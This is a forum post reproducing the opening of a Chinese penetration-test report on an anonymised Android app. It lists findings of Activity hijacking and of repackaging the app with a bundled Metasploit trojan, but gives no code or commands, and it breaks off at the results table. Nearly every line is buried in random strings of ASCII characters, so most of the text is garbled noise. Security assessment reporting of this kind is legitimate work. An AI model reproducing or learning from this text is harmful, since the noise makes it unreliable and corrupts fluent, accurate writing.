中国网络渗透测试联盟

标题: 原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞 [打印本页]

作者: admin    时间: 2022-6-8 20:32
标题: 原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞
2 I' ?8 i3 _0 @1 Z, L" w V! r! c9 [. V$ j2 M' U# l2 Q4 Q9 g

+ ]" Q$ S) S' e4 m3 q7 m( z, N" N 5 D/ v5 F! ^) X( V* }
" k8 k& v: }6 l* |4 U l; C 7 F' {+ [8 q5 ^" k. j: ]# l

+ a! Q8 I& d+ h7 D* J! b" K+ A1 H* L9 ?9 b; x5 X6 t
9 i2 H7 x' V2 m; H6 w; H% m' \ X8 y( L+ i/ O

/ j8 ]: ~/ n K8 y ' H# O5 n" M, a( ^ 文档编号:                j1 R3 Q6 B b* s 5 x! n$ y8 f9 B5 t+ r

* V4 y- ?* n2 D# R' @ 8 p6 c$ u1 E0 b% o1 J+ s( q9 y9 ~

( F- S6 \) K+ A: W " t: c, ~! T" x: D- H/ R   + H- q! K! W- B2 {+ c x4 I! q& c7 U4 s5 b6 N/ c" X# [/ g

5 s5 V2 a# B& m: M2 K. d _( H ; _: t2 ?9 @% w" D

8 h9 t* Q* Z+ d5 H3 Z/ R1 o " G/ {4 q8 U- }/ {   / `! T6 T7 L! ~2 i E 5 u" g# z/ D+ `( K: n

( z, ?1 Z4 b: S$ g, o, V. _ 7 m: i: r' @% R4 F6 o) I5 o

: V1 c g3 M o ' y I: e' P9 r) s4 A   7 Q/ v8 b$ x y- c6 Y/ n) d& E7 K 1 X! e: b& ]0 S; r- e

4 h4 w) m% |, e" ]" k 9 g4 E$ h9 j+ V3 }3 L2 Z( K v6 S o

- S3 h. |5 e6 x- V3 B2 O + k# Q3 k& _5 z% u+ S! W& g! o   % m4 s; A! A$ b 0 y* }2 v- Y( n5 @

9 z0 F N) }) n- P) D- L 3 t4 w; C2 ~/ U

, d% ?/ Z- h, R; d 8 M# e% D" m) R% q- d4 t   2 x1 V$ J+ n# \+ ] 7 q8 p% W- {" W" `

4 N2 d. Q$ Z1 Q( X4 ? E- H7 D 7 p$ m5 K& p2 x( }2 r0 n; V

* t# x" K* A, D$ C, i4 Q 5 h( ^4 X Q! d: O" l0 O$ ~- j 某某某APP渗透测试 , s) B( i8 j6 J# O 8 l- _0 V8 f0 Y: k' i5 D" k9 E

V- d4 G# |( } f9 V. ?' M, F! Z+ e( I

8 A' K* ]6 G1 D; E& [; r0 @$ K8 s 6 g, E1 j5 A. |/ ?! u   3 g+ \3 J/ Y9 W4 t C* u + @3 l. _( E7 d( ]9 e# Z4 W, U

( E+ l+ H: l9 G2 h9 G 5 z! C/ U+ y" j% L: g% g+ d

' E) H! G5 h3 \1 ~ ) w- A$ P# C' K   , u! G- G$ g% h' x 8 v# k& s8 c5 \6 r

b- H" K2 e: E: K+ h ) M' D: k2 @' H$ F/ v

" T% U/ ]+ B, J( I , T" C, A/ E- S, ^   0 |- `. T$ x x$ q6 w" v; v+ |# P S# y

t+ L, p" @: |/ L . C! U% O4 t5 g$ b

" g$ i! |- e; K$ w% @, _7 w6 O \& e2 h# L: U4 o" N& f% h( U1 Z   9 \ n. E3 E3 J, f* i/ a3 M, ] 0 V1 P/ z+ j- f* f8 ~

+ I1 ?/ g' c) w 9 t8 o" p& c7 M3 Z& ]

~$ b. D7 Y6 {; V+ Z% I) z. M W% Q" V' E# e# j4 t7 H! q 技 术 报 告 4 h# G+ I" h' ] ^" w' A& k 1 F# ?6 q1 X5 o. k" D# A7 |

: k4 ^, I/ n7 O0 ]3 F: B. [. { _: ]4 o2 {5 t9 t

: E" t& n5 Y* O 1 i) y9 d U8 b/ A8 ^5 t) H   9 N7 s% T8 ^; _! f. D+ \! y0 Y 5 K( F2 o9 j9 J

- Q. Q$ r7 u4 [& w ! J, J$ q9 Q7 ~. I7 o6 C* Y

3 R) W8 @' I0 q) M1 H% i$ p 3 D$ _. P. k' c3 X c   0 e- C' j/ b% L$ j % ]' v' A+ Y/ V: |9 G

J9 I9 d- a5 @- J# W; ?% c H0 a . p$ Y% V# K% Z a

6 E) D) r/ }; y. y8 N( B+ R7 ^! Y5 q" [) N   $ E) z# p- `! [$ c / m1 B7 h1 z0 u8 Q7 x! O

0 w- m; m4 i/ j/ H" I4 J1 n( N+ b4 R3 n% P

- D# H |5 Z$ W# ~2 N6 {: ?: ]# A- q, x% `3 Y4 q9 @1 d! {3 Y   5 g1 l- q7 T1 S$ d- o + u6 k% {8 z/ j8 l w9 Y/ |$ |

, X% i% x+ R, a, ^1 f m& H4 [& Q4 F# J6 ?' P

" s# L# S* w: V* s9 t / M1 E7 Y6 X6 z) |* k6 @1 N7 |6 @. \   ; U4 ?, t& K% x! z/ @/ G6 H7 m5 x6 f# ]

6 a& X& N8 x9 Q- q2 @ Y! i3 ~* s& G. c0 K/ P' @

* } [! [+ n1 {/ J( i/ o : H/ i( ^, I+ a+ S) a1 P4 f   + h# M8 b$ ?8 M- r0 R3 W; K2 z9 O b5 c) O5 y

8 H, {. b6 Y0 z: z/ [) I8 X. u# d, W; T; n" B. p

$ @" ~. J5 R" Z6 [/ y( l$ A* c $ |& o# |7 _% k% c! ~   2 {* ?* x+ P: G& y - d; r. S/ j8 \1 m7 K

7 Z! w! c. `/ p8 |" u- g; b. w# u. B/ |- {

% }- i8 \+ O% K. d / X. Y( U( C# ]$ x2 h) }3 J$ B' a; \   % M2 q+ s! C2 m( u% F ; V. K( |! G" W# G% o+ i

8 O5 c( y( i3 u$ g. z6 a ; _# Z _1 j6 f

, O( L1 S( S8 a5 ^& T6 H 2 [0 g' u% u! A: a3 I/ ]: G- I   * s0 t( z s* g% y `8 U% e( I* M$ L. n' {/ ~

! J+ X! z1 M4 X. w- O $ V w3 F1 z2 N9 J" N

; _- }6 T5 x9 C" n7 a* ~' E" ~2 v, r! `   " p2 Q' W& f* m: s Q3 r6 U5 U* Y. f* ?8 M4 n3 t

5 }8 u5 l7 \/ o8 O+ ~7 a# o) s* C/ Z

- j* C z8 J8 |/ B1 B M 1 v1 R6 A3 z1 n1 q+ h% M( p8 K+ Y0 M   " s. \ n" s. E- |( m3 V+ J2 R4 t- N5 w ( J% `6 E8 `4 |- C

; b9 e% ?4 r/ n' ^- h- s" Q: l $ g/ u7 L% K( T9 Q8 O n6 E% W

, F1 w( Z' I% l1 @3 V! b % U# \8 K+ o( b( S+ R   2 A* h3 A1 ^6 {+ |3 Q0 V0 e( v& a' W. d

* T+ ~1 e/ i% ?/ K' |* | % x; F3 i5 E k( P$ A0 g) y$ r8 Y

% c" w/ ^* \* I, G $ u/ {4 H6 W3 i) u% E4 r$ C. [& w   1 `' O' F4 o2 Q- P0 x7 \6 m - ]: v L, D D5 N* f3 E% |& |

0 N' u Q" H: C% ~2 j2 Z ; e) B# Z2 B. b3 h8 G3 u

0 `: Q: o: d+ Q( j* [& ]/ V, v# x7 p* l1 E( e   4 ~2 i- i& i- [- `7 y 1 x5 [2 p! a6 a+ [. q/ Z+ G

3 }: S6 k- ]3 ~ W9 V3 D- O/ g 8 D! B- u h5 P* P8 t

4 Z& P: \6 ~% _/ r7 b 4 ]$ ]4 g$ v, z- a$ L; N   a- o6 g) ]8 w1 U ; q, p" H/ E! s% v: a' `6 b

; o7 h& b" V0 K, ] 6 K+ ?! A- b1 F- x

' k2 f& K8 R( w- ~2 C# o , Y5 k1 n" Y4 T1 z7 Q" E   2 c7 e+ \# g6 d- Z% a7 O ' s: x* \: t; T1 }! U

8 u) p9 O B3 g1 Q4 U2 z: m- l5 q4 c( P4 A

: \2 K9 L5 Y' p$ x# }( B ( \$ i; h* O- L; x2 Z   & G* Z* U' S+ ^8 J8 h8 {5 [. F3 H6 Y) U+ o$ O9 m2 A" y1 H

' Q! Q9 G: Y' K: Y 5 U/ Z/ I3 T# Q2 g4 \& _

- z* w" B& I7 Q3 B) d9 h6 q 1 l8 m$ b. J1 b   0 M7 ]% ?8 r; y0 [3 G N2 `5 R' }4 M" V( }

" q+ P: Q+ I. ]! k$ d % x1 y e4 j# @& P- c" ~/ M8 L7 {! y) v

* a. g9 ^' J1 a+ L) F/ s: m. s/ @2 {5 D7 R" ]" M' V Y# { 二〇二〇年 7 P0 a: T0 s, ]5 Z5 F- P ( ^# u1 C$ V4 r `: r! @

5 c- p' x H k! s , ^# p2 ^! k, z6 C
, w& q4 N8 F7 H# [. | $ m; z8 H$ i% l1 Z: p& [, z+ ^
' R$ c# O+ Z7 m9 B# M/ z5 s$ X$ D , O, M1 S1 F) v! i. _+ N
2 B! d9 b6 J, a, s$ V; ?0 Z! g% W/ E! R& `( Y
- G2 g& H) U- r# V+ ?3 B% L8 K1 k 6 M* X" t, a0 F& i! ^! a' P
: P7 m0 o! p! A5 z( @' O & @6 U2 z# {' Z$ J1 t, s
6 a) v& K1 m6 S( o4 ?' q4 H ! n; m3 W) G- U2 O& M1 v+ E! X
8 k( \/ y0 Z3 \, Q1 x( A6 T& h7 C) |4 u6 \
8 h) ^: G8 X% Z1 K/ V# X, [. l+ @# Q+ z( y

9 X, }' J: ~ V7 ~! x9 {7 w# Z) E, ?. r e1 S$ ^1 [ 目 录 : o$ O. ]; {' q R. X : l0 ^7 I' Y. s4 Y& U3 v' W! ^$ E

& h4 a5 |0 g5 f E z1 g ) ~2 _0 L) B8 [* `' W4 ` M . H/ ?5 K, I* A2 \( a ?2 U& S$ l, v- T( v

+ U* ]$ z( x* B# c7 R( n; ?. j# F8 P+ a( |+ v   / \7 \9 Q! n% H+ {, d 6 p0 w% C* N+ {

! ] u/ K0 D$ p# F2 ^. e9 P$ [ - k. E2 q0 {+ D \; p! j

" ?" _9 ^" P1 M- g! T & v$ ~2 K( T X: ?( h 1 概述... 3 2 ?& W, a6 d& B3 q( u * ]/ N5 n \3 \4 j

6 D- T: O# o1 R" L: E ( }' M7 f& \" f: P6 |; d+ @$ n/ A7 ?

* y+ v! D* ]! |1 a* n 5 U8 k/ A/ {+ k& n 1.2测试时间... 3 % V. ~) l* L8 N3 U I( {) v! D' U" x) h

& x8 {5 M8 ]: \/ a: Q" J 9 s6 [. K; U7 V+ f5 y ?

3 n) D; t, G7 V/ p5 A' l' |: B & i2 r5 }$ N8 w( e j1 ? 1.3测试对象... 3 : {/ c% H5 n# T! U . v5 Z3 k; }, K

. D/ m! c8 H$ P' X7 X+ u% k/ B : G+ v6 y2 S2 d2 Q

" \* I- i& G; P / v- L3 b6 T0 R! f 1.4测试结果... 3 * d2 k; z0 f8 { & K b* w! W& q

- X8 i$ I' l! h5 o5 [7 C' d# _$ R w& e2 x2 j- u. g

- j1 t) x! y5 G3 W % d8 ]# T* C( U3 r. G0 ]9 u, N 2 检测结果... 4 ! E6 r- [" o b5 p! I; ~7 f* _+ U7 m# z( W# T

4 B0 F1 J/ k+ d& L" p0 } * H5 K1 S4 Q5 d$ \( d1 Q! V, c

9 G' ]& T9 T* K8 ~3 ~* ^ 1 f8 e- }$ Q9 x( U, b 2.1 某某某... 4 3 y# @6 F+ V! R/ j( c2 i5 m: ]4 N1 T) s* I% I+ q# z" `

, t H+ V$ B) ~6 \9 P' { 1 [& B9 w; G! J$ _# \. U

3 \3 N# l9 k; h. a# h" J/ E. L$ K# d7 p* \. o5 B; b 2.1.1检测目标... 4 5 u8 {% @$ o& [6 y t) | % n! E% p; V8 i

, I5 m! Y. Z& R/ W 3 }7 W" N0 d# B7 S" \) A) D

# }. n; `' i) b4 A* p5 z9 j0 j * z3 h; r2 w4 o0 T5 M 2.1.2检测结果... 4 $ V' d( ~+ ?3 D: P o( x) }, x0 A

/ [! p* Y& B% h4 F* V1 e) ^ & j: z, N( I( X# f

/ a% i! q/ ]: m# N# x+ q 7 j; Q( R, I& d$ B 2.1.2.1. 4 5 s9 V* v/ d2 k$ }$ i$ J0 g3 A1 X/ e! z/ ~: m; @& p3 e9 F1 h3 s

: a$ H6 t% R' r6 B ) z y" Z* x% O

7 ?( ?, B$ N( \, X/ ~2 m! g2 E 8 }, r9 {" Q8 O 2.1.2.2. 6 8 t9 ]# R6 [5 G; } I 7 {5 O1 V9 v1 b- B: f+ v0 T

/ e, s B/ u& }* |3 ^+ ~* U , i: a! o5 u/ W+ B

/ c2 d3 s" a6 e 0 Z2 B5 ^/ \3 c J . o6 ^; ^; D9 p/ X- ?- T. C/ V7 _ m7 v$ N$ y2 y

6 n6 M2 j; q' o8 M2 c% `) K* E% x6 b. N/ k9 H" n5 k
" E0 t: z% V+ Y7 Y : L0 X$ i" T7 F; M, K. O3 U
- L: p9 {+ P/ d2 ] ( C. E$ c5 y o h- G
0 J: `, |% b5 f; d" A* C; G) c# G; s4 K3 W Q
) B6 g0 Y9 X. \* c0 p, Y/ N6 w0 T8 M' E

5 N8 X' Y' X) h8 T: T6 w& Y 5 w4 g8 \; s7 G7 m( O! Y( m$ a 1 概述 , r+ F* M9 F& K8 X3 ~; Q. b$ g5 Z d1 D' G6 k* L% i

. X1 X% X) {6 \# V: h 2 A0 V6 e5 r- ~. y- E( Z' Q0 u

( j8 F0 d( Y& c& Q% H, `& O/ t$ } E9 ]# a0 C: v" g; C: }) |/ D d 1.2测试时间 $ ]' x0 o B$ L9 z/ F! d' K+ f 7 S% v C3 r" e2 f: e* V$ q$ U

6 ]* L9 @* q" n7 j" ] 7 _- _0 \. X7 E' V6 T5 B8 p/ [ 6 S- I) Z9 [/ d+ @+ J3 o' l1 p6 Q9 Z/ L* k1 y* K- _8 e! g. T4 o+ O& V' ^1 q( W! {' t* l. t5 G; E7 s6 `0 B/ j- f5 q/ p7 d1 C8 n1 R Q, C& d* T5 c, W5 o1 r; i) f, M8 i, v. k8 ~& c7 Z# |$ o) I$ b! e2 c J$ S' m( }* ^/ P5 V" s# D. G7 r5 b2 R8 m/ R% s) C6 c6 H- S, [0 W2 D$ f' F+ [, S ]( C. \! [8 j: N2 c5 w' d8 e5 _* f" X/ |+ x* f8 }9 U D4 P# H3 v2 D7 ?! f( P4 C' u. ]# |( E1 S8 S1 v5 C6 ?" M; s$ d/ \4 ]7 O" W" e' |1 s% W3 E5 _% b) G$ s$ c" T" k; M3 `9 _' V2 @% z/ V) w, [% O5 S- f8 B$ C* L& P" j6 K, O8 f, \4 A, `) W* |* J+ f7 C! B# V" g' B6 N/ k3 M6 \) T* N9 W7 h0 b# W/ c- g- ?2 J& S4 Q% i2 z& V
- _2 b7 |2 l9 ]1 J' V& W: P1 n# o1 u0 d- ? Z

* o2 J6 L. F) m) e8 k ; L6 H n( @ P$ m( r 渗透测试时间 ) B: y# t! ]/ X4 u; C+ E 9 Z$ m% Q% b/ o6 S3 j

) e3 Z* P" y1 D % X9 }; M( h9 b4 h& W1 P
1 {# d5 {. }- g : D$ [$ g) T8 e" F# Q9 r

% P9 Q6 k+ @* j0 H6 e 7 U( p% M' t2 R# W- {4 w 起始时间 $ J. q9 g, o3 A9 I( u( Y2 w1 T/ v( ~# Y1 C

0 F: O i- D( p; D) m( p# J: P; C1 ?1 u3 r; S Z9 B" B
7 o& x1 [: t' ?: k - j( p% z1 `- s$ j

) }/ {5 z6 k4 b. {' _+ ^1 s 0 p2 r+ I3 M" K! F' _7 y 202046 3 e3 f7 o9 Y5 V/ ~5 Q$ N' M/ d3 ?# }6 A2 t

. W% d& p; k, b& P/ p' S& c / U: a& C& K& u) g# s3 A! T
% b& A7 D: b2 }* Q2 q k7 q 6 l7 s2 `) q; F. a* _- |1 Z3 \

1 R; K. c7 k# o3 w4 z9 d4 Y3 T 4 _4 v6 m# k" h$ m3 p+ L% m 结束时间 " d+ k: |( g% f6 C" f3 ` |( o& l2 |

6 n" Y S5 u( ?+ H+ Y; Y2 F4 i 0 n8 O+ O) E+ ~; ^; p/ ~ r% D
9 h# M: `; L- ~2 t1 x / A& J- J+ B" M9 S

8 J) p: v# O5 I7 @0 c2 L / @, j) v6 d2 T% s/ }# D5 @ 202049 3 n% ]4 {* K$ L0 ?4 K# g ! H1 @+ o$ v# }" }6 X ^

& J: _; \: Y! i' ?( L: I0 Z8 g8 a# _, P9 B* f7 k1 f3 k+ i" F
; u: j' w" b4 `; x / k6 P. F; R3 C* `* X( y2 J

8 S- Y! x$ c. z& s3 w) k F # K; z4 m( C* }, F/ ^- t 1.3测试对象 2 v; r. w0 ~; ]+ Z# a/ t6 H2 K) ^ ) S) P, f" b: a1 {

8 \& T4 B% t% {! r% G0 z* c& ^; q3 X( P- |

6 u ?$ O9 Q5 z; _2 u0 X4 S5 \ 2 K/ k1 }9 `0 ?0 s6 r 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: 0 K( d2 Q3 j8 H% B* m0 G6 S7 W; `: ^" z* y$ k: o% Z2 c

/ {; @2 f7 k+ L# t) W/ n( a# M6 {

3 e5 E |5 r2 T0 F1 s4 A. L- _) x0 j3 ^+ f% p' c 1-1 检测对象 , B; a5 u; [2 g" V ) k ^8 i& S5 p4 d- s1 J

7 e7 @( R% w$ r8 L d & g$ c3 s9 P/ Q( R3 b 5 Y" z$ C+ F2 \6 L) C( _8 J7 d3 x2 F/ P( a( o/ y0 i0 C# H" z+ P) D# M% g$ k) h7 z5 P |, s, @2 f& [ D9 s7 H" H* t/ u) X+ }, q9 u5 V/ l+ g, F! _' Z& a& ^3 V/ I- E& F! ^ I1 C+ b, ^- e* H; }5 i9 B; J9 t' ^/ Y0 \. \6 P, M; |+ c$ ]( p& x* N( D5 W5 n# M5 Q0 o+ N* R7 z2 z& L/ C n0 Q2 _1 n4 d9 h1 R% h6 r# V. I6 o! Q0 w$ u: a1 D( `! f+ ^" g# @; m; `7 _* D R* o& Z8 P! `3 o$ ^5 c$ k: v; |5 E2 c: t. A# p) a, A% b& U4 c% `' w- t+ M/ \" ~% M$ I% B$ u$ F& B# T6 D( i- H, T* V0 B2 Z! _ @, E) k: O. j, s. _, b% Q) M6 S# e) o- s' Y1 [6 f7 W/ Y8 M! e3 ]1 S6 I7 t- h7 b( c9 A3 |5 n" o0 G& m- r9 w* l( Q' ^, a! c5 U3 W" ~% w$ U4 |& k- ^8 L5 s* t) V2 k0 k. b, E" ?1 `, @0 D, v- w. F4 L U7 }& P9 K {) S+ Y9 L9 e
9 ^# B& ?( M% |. T1 m: P: \+ p4 U! _. { 9 S, U4 w( u: q0 {: `* l

7 R5 C2 T3 ]4 m# [2 G + _: P* V$ b" z; N+ F6 u4 i( P4 G 序号 : J: n0 O% |+ n% F6 I) N4 o1 a M+ ~+ X% }

0 b3 `. J! D1 x2 t * l/ j2 e, L2 w) ?/ \5 |
+ w1 e' N$ n) J& B' e 1 ~( L. y, ~! E4 I* \

- z7 @: t [) u: c/ f* W * ]; ^* D- X/ d 测试对象 % |% m6 \; D# ], x3 A! \6 C% D + i4 R8 Z, t7 Q& J7 `

7 n: N9 y0 m( C" [$ |: e * B1 x' x* n7 W8 C0 p
! U6 z3 i4 [/ R0 b 8 b6 k {5 _( \) S0 I9 j. t' z

6 v. u1 Q2 ~$ L; s1 W. k , R* e8 B& F, ^/ x: n- H" u 测试地址 , A' u. `* r. K% C$ b+ C4 `; V& i

0 ?9 u/ E8 {- {7 Y0 |# l4 @0 {( G1 _* w* y5 F! [; G6 E& O3 I
; q9 S- o* |# I / u# T8 L7 Q* {6 s$ \/ C6 V5 s

% W ^/ f) K m8 N, g6 {! F " X! z) Q9 E/ d) K7 B/ z 安全漏洞 ( ^/ J2 _ w6 y" h: s: h9 U8 ]# r! l# e6 h# Y1 h

2 [: O A; o' C' W- ]: v$ q, Y . Q! [& f u/ Z: W- R
5 W0 z' B3 Q$ s6 S" [4 \6 s$ w# ^ Q3 C4 I8 _- V* u

# `' u' r8 Y# ?) g, E; o: C " U; K. v1 c2 C# ` 1 ! L9 x- M" y7 M% ~ ! z" U- ?9 D+ ~" Y6 t2 P

0 f, f; K# ^9 [* @4 F- B" J4 z& J% I$ ?3 x$ p0 S- W- Y
5 P6 f* w! u6 [ " `9 g) U' m$ a9 Q4 ^! i

9 T3 k4 F; \6 g# n9 S8 G+ X8 W' S2 o- V. ~6 D6 \5 P 某某某安卓APP 3 X. d* z% f: i% n! } : B2 }( @& Y8 d! ]0 J3 d8 o

W1 A; U8 k' ?* D) C6 m3 W- | # y! \/ T7 _6 ^' H
- B9 t" E- D7 u5 @& p 1 X( _: V$ R4 D% e& I9 P+ N: s5 o/ u) E

( s0 O I/ `2 Q. a: B- C . u. g, ^9 F& t! l& Q# a4 h; @   : ^% E- C9 L a2 p# A ?6 P W' C y4 ?, X, X/ j

: [$ @' J* ~9 L5 a 3 \* W3 S I) M5 O
; Q% j# V* b: v1 A 6 Q4 B2 k- O9 }. q; h2 }1 e* U

& \, ]1 m6 v6 J! @0 W 2 U" B. c9 T7 O, k 2 _' Q/ V4 j- N 9 M8 H" @1 E7 {0 Z! D

, q" ^; ^7 [3 D6 } f " S7 `& J3 [4 n9 z, o
& `& H2 w" S; U N3 W ! z% z0 X2 ?, O' \: L8 N

* Q3 N5 X# v2 Z8 B 5 Y& m' t4 X7 n- e M+ F1 S& \/ ?* K- C 1.4测试结果 ! _& {, }4 U3 N8 z q8 X 6 p* n5 Y! g9 F$ y3 r2 R9 s4 i

) W4 Y4 x) x0 F2 S5 G" K $ {! Z: p4 ]2 p0 i

& |2 n8 e! m2 w- r8 Q7 K# ] ?' R. p" R7 z2 ]# M0 m1 } 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: 9 F8 N+ @, v0 ?/ T2 u* i4 F6 K+ J7 o7 K# k/ f

8 v4 V6 @5 |% g: A2 |! @# y! l 1 k) c& S1 v' M& H& C0 H$ ]5 D X3 H

+ t: Y& i% M; }: P* ?; L 5 t) ]9 A! D* ^- h3 M   / W# X6 g/ f% M/ @2 ^ ( ^% r( z4 Q# l; K. c5 w

! I- K5 w q; P2 ~7 ?& d! e 2 m# a( Z+ p- Q+ y8 r% M9 f
- p% w/ f$ i$ C# T% q ~% W/ u6 Q6 r5 a# c* l/ J4 T8 P 7 P4 A$ p# ^; T ] ~- Y/ `2 c2 ^9 b5 H' p% V2 v) d1 c8 r7 j; {0 W4 x$ _5 u" f; ^# q; \8 m/ M9 ?# V( s* S: z3 ]1 X' m0 d9 D U9 o! B7 @& f/ B, n" G$ w$ W+ N7 `5 P' {9 _5 i4 [5 v- k2 @' Q" P3 H1 o$ q7 Q0 k& R8 ]: O/ Q" G/ J# {; P, J% }& j* |7 t6 K9 i2 E8 s) ]4 q! w" {& Y* ~. u$ {! ~9 E; \ q( Y1 f+ ~, |6 {( d4 k- {4 q9 k+ W4 p8 J& t, G/ A r; U/ j9 ~! p4 [+ Z6 `4 X. W9 p% Y# W3 U# [% K4 n+ Y) l0 X. x4 O/ K( Z7 b3 A& [; W/ w3 H3 l$ k) g( O8 T4 \& N. M$ j& E: ?4 L6 r/ U q' k# H' W9 y0 {8 p2 |8 r2 |& ?& s0 V$ F: K+ y! `, Q4 ~( Z: H' O7 L: B8 }8 o3 m0 I- A9 ~! _" w" W/ r! V) d: I, q$ A9 { C9 [4 b' d9 p5 E! d7 q/ H0 c( i5 u1 q3 r# Z, I7 y2 w0 i5 l' R1 o0 @: j+ c% g& ]; @. R5 E5 g D. G& x2 K: K6 d2 C4 x& `) \# _5 c8 y* j, W) I: J4 d* D4 Q+ m0 u! V3 s# t4 n! o, `$ Q( ~/ r2 ?/ Y9 o+ o6 E; z! w; N" S1 W# J* z4 T' q7 D7 N4 t. ^" r$ G: L" b1 Y* e% Z4 _ v, N/ [! K% M+ X) E- V4 ?1 z3 m: b( g, x, ^+ p- d% q6 ?0 T& [" x" Y/ H. ~; g, t" e8 g1 A+ L$ H/ d1 k& p# k" P8 | e9 f! |. L) S* G9 C/ k$ J# H& Q' {* G) j ]) d( S8 L: U! L& b6 ]* E, D$ i; j& \: J$ d: `9 {$ x- y# D% z: S- |( g9 [: ]) N1 P+ j3 b" Z5 _% L7 z+ K( _0 f: i3 o( B' X/ _1 g5 S8 y* u
# t. W% k, L2 Y8 b: g" ?* B * d. m; z2 S' _- K0 L- e

% \1 {" V, f5 p3 w7 J) y1 G - l1 U4 i2 |% Z* R7 c 序号 ) M6 |( @8 h' f1 y$ k. G+ e , y, G3 @& l @ N: d

9 v4 o7 ^3 U7 P , p: @* z8 Y7 ~ d
7 H' N C6 l+ u! U+ X7 J" y# b0 P) v 4 d8 L) l! Z' X" o

( \7 x. H+ G1 i ) G p" X6 a t 系统名称 # k K- }/ J4 [* |& {/ M3 p9 g# L% ~' w! t

; y; q, q! Q: Z- _$ {/ x5 T! F9 W* n$ }1 |" X
6 L& X& w/ s! P! C0 f1 ^ 3 M' ?$ k) A* i' p* t! V

' |# u$ w+ [$ L' P4 J9 l9 q% v O( d% j) n) A 漏洞名称 % T2 [3 U. B8 Y, J, [1 z+ V8 l/ G) q3 W; E3 {! r3 O

' C, a3 w6 x5 r+ c4 i& e* T* h$ Q% E- @! w
* C' a; ^+ G( R5 [/ { : ^$ P3 ~ @1 m2 I% T+ o

) C; M, v: w/ A+ \ ' ?: F5 W g( A* c' e' q# @0 w( Z 漏洞危害 6 P: x- y7 D/ k; }, Y4 W' ~# j , L" \+ z) Q: C \2 w* H2 j

1 ^5 w5 z& c! f5 j 6 `2 R+ U6 r! Y; p6 }
0 c; B- Y9 K' B+ k/ Y 4 l4 Z3 h$ T* g! M

1 _$ j& x! C* |! @/ Q1 Y 2 C: E9 o U. K. J0 S, i) h& P 修复结果 " L+ b5 N, a# P: X. |1 l/ T # N6 K8 x9 y1 Z3 D$ W

, }! P* b" }1 d2 e4 p, {1 w; I2 | ) V( S9 t* k i1 W- @3 z ?
+ A1 ^5 R4 l) X- n* C4 o0 c& f- ~6 z

' k4 y0 R/ n& U. S/ V& g8 }% n2 {3 K 1 ! z2 k( a3 o9 S! }; k% U3 F ! t$ Q( c( R4 w& }( w

, c6 w1 h" M4 @8 x ` + d2 }' ?5 Y" y
; s+ V0 k% k; k- e$ U2 d 3 u6 r+ \, U" P+ `& Q" Z1 G

9 z; ]6 P' f( F' V2 G: ` % I$ f" {- t( b! d 某某某某某某APP ; J9 ?2 H. r8 k8 Q0 q& y. e 2 G- `9 O x; O, M9 R

9 d- r" s; K: L! v2 x* J9 o 6 h, { n+ J$ C& t1 b
) A6 F5 N! x+ c& _- n% m ' D7 b, m2 D! C& x2 B

# t- x) j3 @$ o- y0 z* I S/ ?0 _/ i( ` Activity 劫持 * G' C/ o* h" G; E- d3 s # J7 [9 K7 `8 `! d1 X

- ]9 J* U5 M) s8 j/ R0 ]- ] / y5 {- f$ u( y, y( T* |& L0 K

, R4 \. X9 N, [) R7 ?; Z$ M8 a& e0 |4 e   1 A2 E# X8 w1 I6 j " d3 h0 q* G4 f/ d" I- B

z; g3 ]/ U2 l+ m7 g 1 |: D( q) r7 V+ t2 T
# J6 H4 u+ h! C; N& j ) \( o t: g+ A2 Z* r% z

0 j0 Q9 T5 j+ @ , v% X+ f4 i. c; ] 9 p" X* f- d r' W & ?; Z) C3 Z9 a) X. T7 l* [/ Z' {

+ r. m8 \/ \# `" I- ] 6 o# [$ \2 _, ]# u. M5 t6 ]
1 F; t( g) ]5 E ' }: M0 N, ^ U* T3 r8 F$ M& U

b0 B1 P$ ]: u6 p5 F8 z ! {! \$ v+ i' A7 H1 Q; w   1 ^: G( n" K( B B2 l5 | ]9 S7 y+ u + y- j: Y' L5 o" D' S

; v# X7 r4 T1 @) } ' r+ T7 X$ n* b( B& |4 v
, w- Y+ S# ?8 W! G' e$ c0 R0 z - b1 w1 R2 I" m. a

/ A8 F0 D- e1 S$ @! s- F 1 h R. g+ R$ g6 D3 J# V( ? 2 h6 ^& p, u! q! e # W0 Q% X( {! T" V; }% _% k

# q, V2 O% Y1 M4 B1 ? : ?: O4 L9 h% Y! g- l% o Z- E
- Q1 t7 q( e* ^+ g 7 W8 N& u# b! ~

x% u" j) J: T+ d I4 R- u) y, j0 [' D$ [# f; S, E 某某某某某某APP 6 l% a A7 n8 P/ V' a, D# T9 B ' _: }! ^- h; t m

# M$ ~% D7 l! m! E: t / m% t2 h8 _! V* G' J9 V
8 A/ e3 Y e) P" I, A6 z' C- q - c+ W4 A" X; I# c- e g' b( `

# ?& I/ q h2 d& L + b6 m4 D) ^7 R; V 反编译二次打包捆绑木马、篡改APP代码 8 I0 c" H- ^+ w6 c& y+ ]: w8 s4 E

& r9 H& {1 v3 l' u9 ^1 s# q4 y0 D9 \/ O6 Z
% k5 V/ Q( h( a# M9 g. h' v) I$ _ F1 r' n) [) E9 L

7 I1 k; I! X2 C. z, r" h; @. o! h: s : {) a0 w8 ]2 {1 ?& T6 r0 Y; ^* c 7 O9 B. [, n" v* k2 ^6 |; M' `

- `9 w; x# X9 }- s5 ]8 ~% w4 t8 g) j# x
/ O" C0 I4 n# m; K' D- G# O) r6 O) Z8 U% \# W1 U8 H" {

! ~3 Q k4 F9 n$ n' i# I6 S9 O9 Y: l' G" i& C   1 W; \' `* r- u 5 G, k( u0 D6 v @: I

, q+ H, G0 N& Q# a0 H* p4 l2 t% I( C: F1 F! x
9 @- R) p+ r) u3 B7 z3 F/ s & h4 O' e( k3 Z9 a( }* `$ a# v
# I3 ^2 s+ w, m# i( W$ g& P! D3 _. `, Q

9 c# {% ?+ G1 r7 M9 M! p- i+ ], R" \% \( V5 m! ~   4 }' V. x1 j1 V8 V: D. r : |4 O6 \+ q- X# J- X: z" W& D

1 }$ }9 U8 e$ q* I# v0 m 0 {: a3 ^& j& }: S5 ^5 C. p9 Y) L

1 @9 R7 J6 ~7 p" F5 b/ w# X0 ?" C! x4 a) q% t7 F& ]" K, B8 d 1-2 测试结果 4 |% i9 `( {) J) X G& C5 ]' h; |" M

